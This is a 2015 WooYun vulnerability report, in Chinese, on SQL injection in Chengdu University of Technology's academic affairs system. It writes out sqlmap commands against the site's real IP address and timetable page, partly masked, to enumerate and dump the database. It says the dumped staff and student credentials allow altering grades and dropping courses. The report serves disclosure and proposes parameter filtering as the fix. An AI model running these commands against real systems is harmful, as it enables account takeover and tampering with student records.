当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132733

漏洞标题:成都理工大学教务处SQL注入直接登录教职工帐号

相关厂商:成都理工大学

漏洞作者: tannotour

提交时间:2015-08-10 17:08

修复时间:2015-08-15 17:10

公开时间:2015-08-15 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

可以通过sql注入获得成都理工大学教务处老师信息和学生信息。可以获取到教职工以及学生教务处帐号密码!
获取之后直接在教师端登录即可。登录教师端之后可以上传学生成绩,修改密码等等一系列操作。
登录学生端之后可以进行退课等一系列操作。
发现有些教师使用123,123456等弱口令。

详细说明:

首先使用学生帐号登录到成都理工大学教务处,然后点击“选课”“我的课表”打开课程表。
通过课程表的url,如果对参数进行遍历,可以查看任意一名学生的课程表。
课表的url即为注入点。
利用火狐浏览器的firebug插件查看cookie,将ASP.NET_SessionId与UserTokeID记下来。
使用sqlmap进行sql注入。
过程如下:
1. 枚举DBMS中的数据库
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -dbs
2. 枚举DBMS数据库中的数据表
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -D xxx --tables
3. 枚举DBMS数据库表中的所有列
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -D xxx -T xxx --columns
4. 托库
sqlmap -u"http://202.115.133.186/Classroom/ProductionSchedule/StuProductionSchedule.aspx?termid=201402&stuID=212013xxxxx" -D xxx -T xxx -C xxx --dump
得到帐号密码之后可以在教务处进行登录,本次测试在V3旧系统登录成功,并且可以进行一些敏感操作。

漏洞证明:

0_1439033762022.jpg

1_1439033788597.jpg

3_1439033366518_1439033827865.jpg

4_1439033432300.jpg

5_1439033486247.jpg

修复方案:

在课程表页面的get方式得到的参数进行过滤操作。

版权声明:转载请注明来源 tannotour@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-15 17:10

厂商回复:

最新状态:

暂无